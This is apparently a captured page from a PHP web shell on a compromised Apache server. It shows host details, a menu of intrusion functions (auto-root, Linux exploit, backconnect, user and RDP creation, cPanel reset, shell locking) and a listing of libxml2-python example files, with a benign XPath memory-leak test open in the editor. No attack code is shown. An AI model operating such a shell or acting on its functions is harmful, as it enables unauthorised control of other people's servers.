Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.188.63.71
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml2-python-2.9.1 /
[ HOME SHELL ]
Name
Size
Permission
Action
TODO
1.58
KB
-rw-r--r--
apibuild.py
79.75
KB
-rwxr-xr-x
attribs.py
819
B
-rwxr-xr-x
build.py
1.51
KB
-rwxr-xr-x
compareNodes.py
1.48
KB
-rwxr-xr-x
ctxterror.py
1.29
KB
-rwxr-xr-x
cutnpaste.py
1.26
KB
-rwxr-xr-x
dtdvalid.py
619
B
-rwxr-xr-x
error.py
1.04
KB
-rwxr-xr-x
inbuf.py
498
B
-rwxr-xr-x
index.py
32.14
KB
-rwxr-xr-x
indexes.py
2.9
KB
-rwxr-xr-x
input_callback.py
5.01
KB
-rwxr-xr-x
libxml2class.txt
22.42
KB
-rw-r--r--
nsdel.py
1.55
KB
-rwxr-xr-x
outbuf.py
3.07
KB
-rwxr-xr-x
push.py
769
B
-rwxr-xr-x
pushSAX.py
1.46
KB
-rwxr-xr-x
pushSAXhtml.py
1.57
KB
-rwxr-xr-x
python.html
19.46
KB
-rw-r--r--
reader.py
12.23
KB
-rwxr-xr-x
reader2.py
5.22
KB
-rwxr-xr-x
reader3.py
4.06
KB
-rwxr-xr-x
reader4.py
1.15
KB
-rwxr-xr-x
reader5.py
1.22
KB
-rwxr-xr-x
reader6.py
2.61
KB
-rwxr-xr-x
reader7.py
1.72
KB
-rwxr-xr-x
reader8.py
683
B
-rwxr-xr-x
readererr.py
1.25
KB
-rwxr-xr-x
readernext.py
2.43
KB
-rwxr-xr-x
regexp.py
716
B
-rwxr-xr-x
relaxng.py
1.17
KB
-rwxr-xr-x
resolver.py
857
B
-rwxr-xr-x
schema.py
1.28
KB
-rwxr-xr-x
serialize.py
4.18
KB
-rwxr-xr-x
sync.py
3.44
KB
-rwxr-xr-x
thread2.py
2.25
KB
-rwxr-xr-x
tst.py
587
B
-rwxr-xr-x
tstLastError.py
2.83
KB
-rwxr-xr-x
tstURI.py
1.08
KB
-rwxr-xr-x
tstmem.py
720
B
-rwxr-xr-x
tstxpath.py
1.43
KB
-rwxr-xr-x
validDTD.py
1.2
KB
-rwxr-xr-x
validRNG.py
1.9
KB
-rwxr-xr-x
validSchemas.py
2.02
KB
-rwxr-xr-x
validate.py
1.68
KB
-rwxr-xr-x
walker.py
2.35
KB
-rwxr-xr-x
xpath.py
1.17
KB
-rwxr-xr-x
xpathext.py
1.1
KB
-rwxr-xr-x
xpathleak.py
1.53
KB
-rwxr-xr-x
xpathns.py
552
B
-rwxr-xr-x
xpathret.py
1.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xpathleak.py
#!/usr/bin/python import sys, libxml2 libxml2.debugMemory(True) expect="""--> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed --> Invalid expression --> xmlXPathEval: evaluation failed """ err="" def callback(ctx, str): global err err = err + "%s %s" % (ctx, str) libxml2.registerErrorHandler(callback, "-->") doc = libxml2.parseDoc("<fish/>") ctxt = doc.xpathNewContext() ctxt.setContextNode(doc) badexprs = ( ":false()", "bad:()", "bad(:)", ":bad(:)", "bad:(:)", "bad:bad(:)", "a:/b", "/c:/d", "//e:/f", "g://h" ) for expr in badexprs: try: ctxt.xpathEval(expr) except libxml2.xpathError: pass else: print("Unexpectedly legal expression:", expr) ctxt.xpathFreeContext() doc.freeDoc() if err != expect: print("error") print("received %s" %(err)) print("expected %s" %(expect)) sys.exit(1) libxml2.cleanupParser() leakedbytes = libxml2.debugMemory(True) if leakedbytes == 0: print("OK") else: print("Memory leak", leakedbytes, "bytes") # drop file to .memdump file in cwd, but won't work if not compiled in libxml2.dumpMemory()
Close